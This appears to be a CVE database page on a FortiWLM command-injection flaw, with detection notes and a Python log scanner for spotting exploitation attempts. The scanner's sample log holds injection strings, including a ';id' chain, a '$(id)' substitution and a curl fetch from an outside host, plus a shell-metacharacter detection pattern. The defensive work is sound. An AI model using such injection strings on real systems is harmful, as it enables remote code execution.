CVE-2023-36549
published 2023-10-10

Priority: P270 · Severity: Critical · CVSS 3.1 base score: 9.8
CVSS vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS: 2.11% (79.4th percentile)
An improper neutralization of special elements used in an OS command ('OS command injection') in Fortinet FortiWLM version 8.6.0 through 8.6.5 and 8.5.0 through 8.5.4 allows an attacker to execute unauthorized code or commands via specifically crafted HTTP GET request parameters.

Affected (4 ranges)

Vendor     Product    Version range    Fixed in
fortinet   fortinet   –                –
fortinet   fortiwlm   –                –
fortinet   fortiwlm   8.5.0 – 8.5.4    –
fortinet   fortiwlm   8.6.0 – 8.6.5    –

Detection & IOCs (extracted from sources)

  • The vulnerability is triggered via crafted HTTP GET request parameters sent to Fortinet FortiWLM; monitor for anomalous or malicious GET request parameters targeting FortiWLM endpoints.
  • Affected versions are FortiWLM 8.6.0–8.6.5 and 8.5.0–8.5.4; flag traffic to or from FortiWLM instances still running a version in these ranges.
  • The weakness is OS command injection (CWE-78) via HTTP GET; inspect GET parameters (after URL decoding) for shell metacharacters or command-chaining sequences aimed at FortiWLM.
  • This CVE is grouped with related FortiWLM OS command injection issues (CVE-2023-34993, CVE-2023-36547, CVE-2023-36548, CVE-2023-36550); detections should cover the whole family, since they share the same attack vector.
  • The CVSS 3.1 base score is 9.8 (Critical) with vector AV:N/AC:L/PR:N/UI:N, i.e. remote exploitation without authentication or user interaction; prioritize detection and patching for internet-exposed FortiWLM instances.
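The detection notes above amount to two checks: decode GET parameters and look for shell metacharacters or chaining sequences, and compare a FortiWLM version against the affected ranges. The script below is an added example written for this page; it is not tooling from Fortinet or from the CVE database. The log format, the request paths (`/api/status`) and the parameter name (`host`) are constructed placeholders, since the page does not name the vulnerable FortiWLM endpoint or parameter.

```python
"""Scan web access logs for GET parameters that look like OS command
injection (CVE-2023-36549 family) and check FortiWLM versions against the
affected ranges listed on this page. Added example, not vendor code."""
import re
from urllib.parse import urlsplit, unquote

# Affected ranges exactly as listed on this page (inclusive bounds).
AFFECTED_RANGES = [((8, 5, 0), (8, 5, 4)), ((8, 6, 0), (8, 6, 5))]

# Shell metacharacters and command-chaining constructs that should never
# appear in a management-UI GET parameter: ; | & ` < > newline, $( and ${.
SHELL_META = re.compile(r"[;|&`<>\r\n]|\$[\(\{]")

# Combined-style access log line (constructed format for this demo).
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) '
    r'(?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3})'
)


def parse_version(v):
    """'8.6.3' -> (8, 6, 3); rejects anything that is not three integers."""
    parts = tuple(int(p) for p in v.strip().split("."))
    if len(parts) != 3:
        raise ValueError(f"unexpected FortiWLM version format: {v!r}")
    return parts


def is_affected(version):
    """True if the version falls inside one of the affected ranges."""
    v = parse_version(version)
    return any(lo <= v <= hi for lo, hi in AFFECTED_RANGES)


def suspicious_params(target):
    """Return [(name, decoded_value)] for GET params with shell metacharacters.

    The raw query is split on '&' only (so an encoded %26 stays inside its
    value) and each value is URL-decoded twice so that double-encoded
    payloads such as %2524%2528id%2529 -> %24%28id%29 -> $(id) are caught.
    """
    hits = []
    for pair in urlsplit(target).query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        decoded = unquote(unquote(value))
        if SHELL_META.search(decoded):
            hits.append((unquote(name), decoded))
    return hits


def scan_log(lines):
    """Return one finding per GET request whose parameters look injected."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m.group("method") != "GET":
            continue  # only the GET vector is in scope for this CVE
        hits = suspicious_params(m.group("target"))
        if hits:
            findings.append({
                "src": m.group("src"),
                "path": urlsplit(m.group("target")).path,
                "params": hits,
            })
    return findings


# Constructed sample log lines; paths and parameter names are placeholders.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Oct/2023:12:00:01 +0000] "GET /api/status?host=ap-17 HTTP/1.1" 200',
    '198.51.100.7 - - [10/Oct/2023:12:00:02 +0000] "GET /api/status?host=ap-17;id HTTP/1.1" 200',
    '198.51.100.7 - - [10/Oct/2023:12:00:03 +0000] "GET /api/status?host=x%26%26curl%20http%3A%2F%2F198.51.100.9%2Fp HTTP/1.1" 200',
    '198.51.100.7 - - [10/Oct/2023:12:00:04 +0000] "GET /api/status?host=%2524%2528id%2529 HTTP/1.1" 200',
    '10.0.0.6 - - [10/Oct/2023:12:00:05 +0000] "POST /login HTTP/1.1" 302',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['src']} -> {f['path']} params={f['params']}")
    for v in ("8.5.4", "8.5.5", "8.6.0", "8.6.6"):
        print(v, "affected" if is_affected(v) else "not in an affected range")
```

Running the block flags the three requests from 198.51.100.7 (a `;` chain, a double-`&&` chain that was single-encoded, and a `$(...)` substitution that was double-encoded) and leaves the benign GET and the POST alone. The double decode is deliberate: a single `unquote` would report the last payload as the harmless-looking string `%24%28id%29`.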